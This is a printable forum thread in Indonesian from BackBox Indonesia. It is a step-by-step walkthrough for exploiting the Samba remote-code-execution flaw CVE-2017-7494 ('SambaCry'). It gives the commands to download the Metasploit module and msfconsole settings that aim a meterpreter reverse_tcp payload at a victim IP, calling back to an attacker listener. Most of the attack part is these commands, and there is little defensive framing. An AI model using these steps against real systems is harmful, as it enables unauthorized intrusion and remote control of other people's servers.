BackBox Indonesia
Samba Exploit (CVE-2017-7494) SambaCry? - Printable Version

+- BackBox Indonesia (https://www.backboxindonesia.or.id)
+-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Exploitation (https://www.backboxindonesia.or.id/forum-13.html)
+--- Thread: Samba Exploit (CVE-2017-7494) SambaCry? (/thread-224.html)



Samba Exploit (CVE-2017-7494) SambaCry? - penjagalilin - 06-14-2017

Setelah beberapa waktu lalu sempet tenar WannaCry dengan memakai SMB Exploit (EternalBlue & DoublePulsar) di Windows, sesaat kemudian juga ditemukan vulnerability di OS keluarga Linux yang menjalankan SAMBA sebagai file-sharing daemon nya. Samba Exploit ini dapat menyerang service Samba versi 3.5.0 sampai 4.4.14, 4.5.10, and 4.6.4. Lebih tepatnya exploit ini memanfaatkan bug writeable file pada versi Samba tersebut untuk melakukan RCE (Remote Code Execution) di komputer korban.





1. Dapatkan module Metasploit dari Samba Exploit (is_known_pipename.rb)

Code:
root@attackermachine~:# wget https://github.com/rapid7/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O /opt/metasploit-frameworks/modules/exploits/linux/samba/sambacry.rb

Keterangan :
wget akan mengunduh file is_known_pipe_name.rb dan akan menaruhnya di direktori Metasploit Framework dengan nama sambacry.rb
Dalam hal ini bisa saja letak direktori Metasploit Framework kalian bukan di /opt/


2. Jalankan msfconsole dan mulai exploitasi

Code:
root@attackermachine~:# msfconsole
msf > use exploit/linux/samba/sambacry
msf exploit(sambacry) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf exploit(sambacry) > set RHOST IP_KORBAN
msf exploit(sambacry) > set LHOST IP_LISTENER_ATTACKER
msf exploit(sambacry) > set TARGET 3
msf exploit(sambacry) > exploit

Keterangan :
Jika architecture OS korban adalah 32bit maka : set PAYLOAD linux/meterpreter/reverse_tcp
Untuk set TARGET saya memilih opsi 3, jalankan perintah show targets untuk melihat list architecture target yang tersedia.

[Image: Screenshot_55.png]



3. Jika exploitasi berhasil, maka akan muncul tampilan seperti berikut

[Image: Screenshot_56.png]




Bonus video :







Oke sekian post nya, semoga bermanfaat. Terimakasih.